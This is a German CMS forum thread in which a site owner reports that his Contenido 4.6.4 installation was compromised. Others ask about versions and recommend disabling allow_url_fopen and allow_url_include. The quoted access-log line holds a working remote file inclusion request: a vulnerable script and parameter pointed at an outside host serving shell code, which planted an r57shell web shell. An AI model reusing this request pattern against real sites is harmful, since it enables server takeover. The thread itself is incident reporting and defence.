Server über Contenido gehackt - unsicherer Code?

Gesperrt
walter999
Beiträge: 161
Registriert: Di 24. Mai 2005, 11:23
Wohnort: Rain/Dürnhart
Kontaktdaten:

Server über Contenido gehackt - unsicherer Code?

Beitrag von walter999 »

Mein Provider teilte mir gestern mit das mein Account gehackt worden ist.

Folgender Eintrag befindet sich in der Access-Log:

Code: Alles auswählen

- - [03/Jun/2008:23:32:27 +0200] "POST 
/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.churchlawgroup.com/amember/main.txt.t
xt? HTTP/1.0" 200 33327 
http://www.MEINE_ANGEGRIFFENE_DOMAIN.com/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.churchlawgro
up.com/amember/main.txt.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Daraufhin habe ich natürlich gesucht und eine eingeschleuste Datei gefunden.
Die Datei ist eine bekannte Hackdatei: r57shell.php
Sie wurde unter dem Namen include.html.php im include-Verzeichnis gespeichert. Ich habe diese natürlich sofort gelöscht.

Mein Anbieter teilte mir folgendes mit:

Das ist die unsichere Variable in diesem aufgerufenen Script welche dann für einen so genannten CodeInjection missbraucht wurde:

cfg[path][contenido]=

Und dieser unsicheren Variable wurde diese URL angehängt:

http://www.churchlawgroup.com/amember/main.txt.txt?

Diese externe Textdatei enhält reinen Quellcode über den Angreifer zB. eine Art Dateiexplorer ausführen um fremde Dateien auf Ihren Account zu schieben.

Kann dies einer der Contenido-Entwickler bestätigen?

Ich bitte Euch schnellstmöglich einen Patch dafür bereitzustellen.


Vielen Dank und viele Grüße
Walter
emergence
Beiträge: 10653
Registriert: Mo 28. Jul 2003, 12:49
Wohnort: Austria
Kontaktdaten:

Beitrag von emergence »

welche contenido version ?
welche php version ?
*** make your own tools (wishlist :: thx)
Dodger77
Beiträge: 3626
Registriert: Di 12. Okt 2004, 20:00
Wohnort: Voerde (Niederrhein)
Kontaktdaten:

Beitrag von Dodger77 »

emergence hat geschrieben:welche contenido version ?
Ich vermute mal 4.6.4 oder früher.
walter999
Beiträge: 161
Registriert: Di 24. Mai 2005, 11:23
Wohnort: Rain/Dürnhart
Kontaktdaten:

Beitrag von walter999 »

Sorry hab ich total vergessen zu nennen:

Contenido-Version: 4.6.4 (ist schon ein älteres Projekt)
PHP-Version: 4.4.8

Gibts dazu Sicherheitspatches oder müßte man komplett updaten (was ich eigentlich vermeiden möchte da ziemlich viel individuell umprogrammiert wurde und manche Module da sicher Probleme machen weren.

Viele Grüße und danke
Walter
MichFress
Beiträge: 750
Registriert: Mo 5. Jan 2004, 22:32
Wohnort: Bochum
Kontaktdaten:

Beitrag von MichFress »

"Es wird keine Handlung geben, keine Geschichte mit ihrer Versprechung auf einen Anfang und ihrer Hoffnung auf ein Ende." (Andrzej Stasiuk)
walter999
Beiträge: 161
Registriert: Di 24. Mai 2005, 11:23
Wohnort: Rain/Dürnhart
Kontaktdaten:

Beitrag von walter999 »

Danke kannte ich noch nicht obwohl ich vorher die Suche bemühte. Vielleicht hab ich zu spezifisch für mein Problem gesucht.

Danke!!!

Grüße
Walter
rethus
Beiträge: 1851
Registriert: Di 28. Mär 2006, 11:55
Wohnort: Mönchengladbach
Kontaktdaten:

Beitrag von rethus »

Ich kann nur empfehlen, lasst euch unbeding allow_url_follow für euren Webspace deaktivieren. Das erspart Euch eine menge Ärger, in Sachen php-injection.
Could I help you... you can help me... buy me a coffee . (vielen ❤ Dank an: Seelauer, Peanut, fauxxami )

xstable.com: - HighSpeed Hosting, Domains, DomainReselling, Linux-Administration
suther.de: - App-Programierung, High-Performance-Webpages, MicroServices, API-Anbindungen & Erstellung

Software... ein Blick wert: GoogleCalender Eventlist, xst_dynamic_contentType
quacon
Beiträge: 9
Registriert: Di 17. Jun 2008, 18:18
Kontaktdaten:

Beitrag von quacon »

allow_url_follow? Du meinst sicherlich allow_url_fopen und für PHP 5 allow_url_include. allow_url_follow ist mir nicht bekannt. In der Tat sollte man beide auf "off" setzen. Viele Grüße, quacon
Gesperrt